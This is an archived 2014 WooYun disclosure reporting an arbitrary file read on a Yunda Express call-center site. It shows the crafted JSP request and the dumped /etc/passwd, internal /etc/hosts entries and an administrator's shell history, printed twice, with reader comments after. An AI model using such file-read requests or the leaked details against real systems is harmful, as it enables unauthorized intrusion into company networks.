韵达快递某站点已被getshell

admin
admin
admin
142929
文章
117
评论
2015年7月20日01:34:44评论218 views字数 213阅读0分42秒阅读模式
摘要

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-27: 厂商已经确认,细节仅向厂商公开
2014-11-06: 细节向核心白帽子及相关领域专家公开
2014-11-16: 细节向普通白帽子公开
2014-11-26: 细节向实习白帽子公开
2014-12-10: 细节向公众公开

漏洞概要 关注数(21) 关注此漏洞

缺陷编号: WooYun-2014-80911

漏洞标题: 韵达快递某站点已被getshell

相关厂商: 韵达快递

漏洞作者: fuckadmin

提交时间: 2014-10-26 22:31

公开时间: 2014-12-10 22:32

漏洞类型: 命令执行

危害等级: 高

自评Rank: 12

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 安全意识不足 安全意识不足

2人收藏

漏洞详情

披露状态:

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-27: 厂商已经确认,细节仅向厂商公开
2014-11-06: 细节向核心白帽子及相关领域专家公开
2014-11-16: 细节向普通白帽子公开
2014-11-26: 细节向实习白帽子公开
2014-12-10: 细节向公众公开

简要描述:

看到偶像猪猪侠的洞被忽略,我等感到十分不满,遂想韵达站点定有问题,便用神器扫之。

详细说明:

mask 区域 
1.http://**.**.**/callcenter_new/file/a.jspsort=1&file=%2Fetc%2Fhosts

#1

code 区域 
root:x:0:0:root:/root:/bin/bash
 bin:x:1:1:bin:/bin:/sbin/nologin
 daemon:x:2:2:daemon:/sbin:/sbin/nologin
 adm:x:3:4:adm:/var/adm:/sbin/nologin
 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
 sync:x:5:0:sync:/sbin:/bin/sync
 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
 halt:x:7:0:halt:/sbin:/sbin/halt
 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
 news:x:9:13:news:/etc/news:
 uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
 operator:x:11:0:operator:/root:/sbin/nologin
 games:x:12:100:games:/usr/games:/sbin/nologin
 gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
 ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
 nobody:x:99:99:Nobody:/:/sbin/nologin
 nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
 rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
 apache:x:48:48:Apache:/var/www:/sbin/nologin
 mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
 smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
 ntp:x:38:38::/etc/ntp:/sbin/nologin
 oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
 pcap:x:77:77::/var/arpwatch:/sbin/nologin
 dbus:x:81:81:System message bus:/:/sbin/nologin
 avahi:x:70:70:Avahi daemon:/:/sbin/nologin
 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
 haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
 avahi-autoipd:x:100:159:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
 rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
 nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
 xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
 gdm:x:42:42::/var/gdm:/sbin/nologin
 sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
 nagios:x:500:500::/home/nagios:/bin/bash
 mysql:x:101:160:MySQL server:/var/lib/mysql:/bin/bash
 oracle:x:501:501::/home/oracle:/bin/bash

#2

code 区域 
127.0.0.1 localhost
 #10.10.14.10     qz.yundasys.com
 10.0.16.4       join.yundasys.com
 10.0.16.3       kjcx.yundasys.com
 #10.0.14.4  join.yundasys.com
 10.0.43.106 yd43106

内网已知,kjcx.yundasys.com乃快件查询站点,裤子在哪里?

code 区域 
export DISPLAY=10.0.2.1:0.0
 xclock
 /usr/java/jdk1.7.0_25/bin/java -jar wls1211_generic.jar
 cd /u02/weblogic/wlserver_12.1/common/bin
 ./config.sh
 vi /u02/weblogic/user_projects/domains/base_domain/bin/setDomainEnv.sh  
 mkdir /u02/weblogic/user_projects/domains/base_domain/servers/AdminServer/security -p
 cd    /u02/weblogic/user_projects/domains/base_domain/servers/AdminServer/security
 vi boot.properties
 vi /home/oracle/ws.sh
 chmod +x /home/oracle/ws.sh
 cd
 ./ws.sh 
 netstat -anplt |grep 22022
 netstat -anplt |grep 22022
 ps -ef |grep java
 ps -ef |grep java
 netstat -anlp |grep java
 exit
 ls
 cd /u02/redis/
 ls
 su -
 ls
 exit
 ls
 cd /u02
 ls
 ll
 mv callcenter_newyw.war callcenter_new.war 
 cd ..
 exit
 ls
 cd /u02/
 ls
 exit
 ls
 cd /u02/
 ls
 exit
 killall java
 killall java
 killall java
 ./ws.sh 
 ls
 cd /u02/weblogic/
 ls
 cd user_projects/domains/base_domain/
 ls
 tail -f startWebLogic.log 
 exit
 ./ws.sh 
 exit
 ls
 cd /u02
 ls
 rm -rf callcenter_new.war 
 exit
 killall java
 killall java
 killall java
 ./ws.sh 
 tail -f /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log 
 ping 10.0.43.106
 exit
 killall java
 killall java
 killall java
 ./ws.sh 
 killall java
 killall java
 ./ws.sh 
 exit
 cd /u02
 ls
 cp callcenter_new.war /home/oracle/
 cd
 ls
 mkdir callcenter_new 
 ll
 cp callcenter_new.war callcenter_new
 cd callcenter_new
 ls
 jar -xvf callcenter_new.war 
 1;2c1;2c1;2c
 ls
 rm -rf callcenter_new.war 
 ll
 cd 
 ls
 ll
 chown oracle:dba index.js*
 ls
 ll
 cd callcenter_new
 ls
 cp ../index.jsp ./
 ll index.jsp 
 ls
 ls
 rm -rf index.jsp 
 cp ../index.jsp ./
 ls
 cd js
 ls
 rm -rf index.js 
 cp ../../index.js ./
 ls
 ll index.js 
 cd ..
 ls
 jar -cvf callcenter_new.war * 
 1;2c1;2c1;2c
 ls
 mv callcenter_new.war callcenter_new.warx
 ll
 sl
 ls
 cp callcenter_new.warx /u02/
 cd /u02/
 ls
 killall java
 killall java
 cd
 ./ws.sh 
 top
 ls
 ps -ef | grep java
 ./ws.sh 
 exit
 ./ws.sh 
 cd /usr/local/nginx/sbin/
 ls
 ./nginx
 exit
 cd /u02
 ls
 exit
 ls
 ./ws.sh 
 exit
 cd /u02/
 ls
 mv callcenter_new.war0520bak
 mv callcenter_new.war callcenter_new.war0520bak
 exit
 killall java
 ls
 ./ws.sh 
 exit
 ./ws.sh 
 exit
 ./ws.sh 
 exit
 killall java
 killall java
 killall java
 killall java
 killall java
 ./ws.sh 
 tail -f /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log 
 tail -f /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log 
 exit
 cd /u02
 ls
 cd weblogic/user_projects/domains/base_domain/
 killall java
 killall java
 killall java
 ls
 mv startWebLogic.log startWebLogic.loga
 cd 
 ./ws.sh 
 tail -f /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log
 vim /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log
 vim /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log
 vim /u02/weblogic/user_projects/domains/base_domain/callcenter_jobscheduler.log 
 ls
 exit
 ./ws.sh 
 exit
 ./ws.sh 
 exit
 ls
 ./ws.sh 
 ll
 df -h 
 cd callcenter_new
 ls
 df -h 
 cd 
 cd /u02/weblogic/user_projects/domains/base_domain/
 ls
 df -h 
 cd 
 ls
 ll
 cd /u02/
 ll
 cd weblogic/
 ls
 ll
 cd user_projects/domains/base_domain/
 ls
 ls
 ll
 df -h 
 df -h 
 ls
 cd 
 ls
 cd callcenter_new
 ls
 cd logs
 ls
 ll
 cd 
 ls
 cd /
 ls
 ll
 cd /u02
 ls
 ls
 cd redis/
 ls
 cd log
 ls
 ll
 cd ..
 ls
 cd conf
 ls
 cd ..
 cd db
 ls
 cd 
 ls
 cd 
 ls
 cd /u02
 ls
 cd webapps/
 ls
 cd callcenter_new/
 ls
 ll
 cd 
 ls
 cd /u02
 ls
 cd weblogic/
 ls
 cd logs
 ls
 ll
 cd 
 cd /u02
 ls
 cd weblogic/
 ls
 cd user_projects/domains/base_domain/
 ls
 w 
 df -h 
 df -h 
 killall java
 killall java
 killall java
 killall java
 killall java
 ./ws.sh 
 vi /etc/hosts
 exit
 ./ws.sh 
 cd /usr/local/nginx/logs
 echo "" > app_error.log 
 ll
 su - root
 crontab -l 
 crontab -l
 crontab -e

漏洞证明:

mask 区域 
1.http://**.**.**/callcenter_new/file/a.jspsort=1&file=%2Fetc%2Fhosts

#1

code 区域 
root:x:0:0:root:/root:/bin/bash
 bin:x:1:1:bin:/bin:/sbin/nologin
 daemon:x:2:2:daemon:/sbin:/sbin/nologin
 adm:x:3:4:adm:/var/adm:/sbin/nologin
 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
 sync:x:5:0:sync:/sbin:/bin/sync
 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
 halt:x:7:0:halt:/sbin:/sbin/halt
 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
 news:x:9:13:news:/etc/news:
 uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
 operator:x:11:0:operator:/root:/sbin/nologin
 games:x:12:100:games:/usr/games:/sbin/nologin
 gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
 ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
 nobody:x:99:99:Nobody:/:/sbin/nologin
 nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
 rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
 apache:x:48:48:Apache:/var/www:/sbin/nologin
 mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
 smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
 ntp:x:38:38::/etc/ntp:/sbin/nologin
 oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
 pcap:x:77:77::/var/arpwatch:/sbin/nologin
 dbus:x:81:81:System message bus:/:/sbin/nologin
 avahi:x:70:70:Avahi daemon:/:/sbin/nologin
 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
 haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
 avahi-autoipd:x:100:159:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
 rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
 nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
 xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
 gdm:x:42:42::/var/gdm:/sbin/nologin
 sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
 nagios:x:500:500::/home/nagios:/bin/bash
 mysql:x:101:160:MySQL server:/var/lib/mysql:/bin/bash
 oracle:x:501:501::/home/oracle:/bin/bash

#2

code 区域 
127.0.0.1 localhost
 #10.10.14.10     qz.yundasys.com
 10.0.16.4       join.yundasys.com
 10.0.16.3       kjcx.yundasys.com
 #10.0.14.4  join.yundasys.com
 10.0.43.106 yd43106

内网已知,kjcx.yundasys.com乃快件查询站点,裤子在哪里?

code 区域 
export DISPLAY=10.0.2.1:0.0
 xclock
 /usr/java/jdk1.7.0_25/bin/java -jar wls1211_generic.jar
 cd /u02/weblogic/wlserver_12.1/common/bin
 ./config.sh
 vi /u02/weblogic/user_projects/domains/base_domain/bin/setDomainEnv.sh  
 mkdir /u02/weblogic/user_projects/domains/base_domain/servers/AdminServer/security -p
 cd    /u02/weblogic/user_projects/domains/base_domain/servers/AdminServer/security
 vi boot.properties
 vi /home/oracle/ws.sh
 chmod +x /home/oracle/ws.sh
 cd
 ./ws.sh 
 netstat -anplt |grep 22022
 netstat -anplt |grep 22022
 ps -ef |grep java
 ps -ef |grep java
 netstat -anlp |grep java
 exit
 ls
 cd /u02/redis/
 ls
 su -
 ls
 exit
 ls
 cd /u02
 ls
 ll
 mv callcenter_newyw.war callcenter_new.war 
 cd ..
 exit
 ls
 cd /u02/
 ls
 exit
 ls
 cd /u02/
 ls
 exit
 killall java
 killall java
 killall java
 ./ws.sh 
 ls
 cd /u02/weblogic/
 ls
 cd user_projects/domains/base_domain/
 ls
 tail -f startWebLogic.log 
 exit
 ./ws.sh 
 exit
 ls
 cd /u02
 ls
 rm -rf callcenter_new.war 
 exit
 killall java
 killall java
 killall java
 ./ws.sh 
 tail -f /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log 
 ping 10.0.43.106
 exit
 killall java
 killall java
 killall java
 ./ws.sh 
 killall java
 killall java
 ./ws.sh 
 exit
 cd /u02
 ls
 cp callcenter_new.war /home/oracle/
 cd
 ls
 mkdir callcenter_new 
 ll
 cp callcenter_new.war callcenter_new
 cd callcenter_new
 ls
 jar -xvf callcenter_new.war 
 1;2c1;2c1;2c
 ls
 rm -rf callcenter_new.war 
 ll
 cd 
 ls
 ll
 chown oracle:dba index.js*
 ls
 ll
 cd callcenter_new
 ls
 cp ../index.jsp ./
 ll index.jsp 
 ls
 ls
 rm -rf index.jsp 
 cp ../index.jsp ./
 ls
 cd js
 ls
 rm -rf index.js 
 cp ../../index.js ./
 ls
 ll index.js 
 cd ..
 ls
 jar -cvf callcenter_new.war * 
 1;2c1;2c1;2c
 ls
 mv callcenter_new.war callcenter_new.warx
 ll
 sl
 ls
 cp callcenter_new.warx /u02/
 cd /u02/
 ls
 killall java
 killall java
 cd
 ./ws.sh 
 top
 ls
 ps -ef | grep java
 ./ws.sh 
 exit
 ./ws.sh 
 cd /usr/local/nginx/sbin/
 ls
 ./nginx
 exit
 cd /u02
 ls
 exit
 ls
 ./ws.sh 
 exit
 cd /u02/
 ls
 mv callcenter_new.war0520bak
 mv callcenter_new.war callcenter_new.war0520bak
 exit
 killall java
 ls
 ./ws.sh 
 exit
 ./ws.sh 
 exit
 ./ws.sh 
 exit
 killall java
 killall java
 killall java
 killall java
 killall java
 ./ws.sh 
 tail -f /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log 
 tail -f /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log 
 exit
 cd /u02
 ls
 cd weblogic/user_projects/domains/base_domain/
 killall java
 killall java
 killall java
 ls
 mv startWebLogic.log startWebLogic.loga
 cd 
 ./ws.sh 
 tail -f /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log
 vim /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log
 vim /u02/weblogic/user_projects/domains/base_domain/startWebLogic.log
 vim /u02/weblogic/user_projects/domains/base_domain/callcenter_jobscheduler.log 
 ls
 exit
 ./ws.sh 
 exit
 ./ws.sh 
 exit
 ls
 ./ws.sh 
 ll
 df -h 
 cd callcenter_new
 ls
 df -h 
 cd 
 cd /u02/weblogic/user_projects/domains/base_domain/
 ls
 df -h 
 cd 
 ls
 ll
 cd /u02/
 ll
 cd weblogic/
 ls
 ll
 cd user_projects/domains/base_domain/
 ls
 ls
 ll
 df -h 
 df -h 
 ls
 cd 
 ls
 cd callcenter_new
 ls
 cd logs
 ls
 ll
 cd 
 ls
 cd /
 ls
 ll
 cd /u02
 ls
 ls
 cd redis/
 ls
 cd log
 ls
 ll
 cd ..
 ls
 cd conf
 ls
 cd ..
 cd db
 ls
 cd 
 ls
 cd 
 ls
 cd /u02
 ls
 cd webapps/
 ls
 cd callcenter_new/
 ls
 ll
 cd 
 ls
 cd /u02
 ls
 cd weblogic/
 ls
 cd logs
 ls
 ll
 cd 
 cd /u02
 ls
 cd weblogic/
 ls
 cd user_projects/domains/base_domain/
 ls
 w 
 df -h 
 df -h 
 killall java
 killall java
 killall java
 killall java
 killall java
 ./ws.sh 
 vi /etc/hosts
 exit
 ./ws.sh 
 cd /usr/local/nginx/logs
 echo "" > app_error.log 
 ll
 su - root
 crontab -l 
 crontab -l
 crontab -e

修复方案:

1.挖掘机哪家强?

版权声明:转载请注明来源 fuckadmin@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-10-27 09:57

厂商回复:

感谢指出,我们立即修复

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-10-26 22:33 | xsser 韵达快递某站点已被getshell ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    1

    求神器

  2. 2014-10-26 23:15 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    0

    @fuckadmin 厂商忽略不一定是厂商故意要忽略,也可能是厂商压根就没有去看邮件通知或者几乎不上线了

  3. 2014-10-26 23:24 | fuckadmin ( 普通白帽子 | Rank:662 漏洞数:92 | 千里之堤溃于蚁穴)

    0

    @U神 即可说明厂商对安全不重视?

  4. 2014-10-27 00:17 | 猪猪侠 韵达快递某站点已被getshell ( 核心白帽子 | Rank:5372 漏洞数:415 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    1

    别这样啊,厂商也有厂商的难处,要理解他们。

  5. 2014-10-27 08:55 | ki11y0u ( 普通白帽子 | Rank:140 漏洞数:28 | 好好学习,求带飞 ~~~~~~~~~~~~~~~~~~~~~~...)

    0

    rank好高

  6. 2014-10-27 12:01 | xsser 韵达快递某站点已被getshell ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    0

    咋发现的呢

  7. 2014-11-17 09:40 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

    1

    后面那部分没看明白

  8. 2014-11-20 23:30 | fuckadmin ( 普通白帽子 | Rank:662 漏洞数:92 | 千里之堤溃于蚁穴)

    1

    @wefgod 后面部分为history

  9. 2014-11-20 23:31 | fuckadmin ( 普通白帽子 | Rank:662 漏洞数:92 | 千里之堤溃于蚁穴)

    1

    @xsser site:yundasys.com,感谢度娘。

  10. 2014-12-11 09:59 | BMa 韵达快递某站点已被getshell ( 核心白帽子 | Rank:2078 漏洞数:229 )

    1

    ~.bash_history

  11. 2014-12-11 10:03 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

    1

    求神器

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin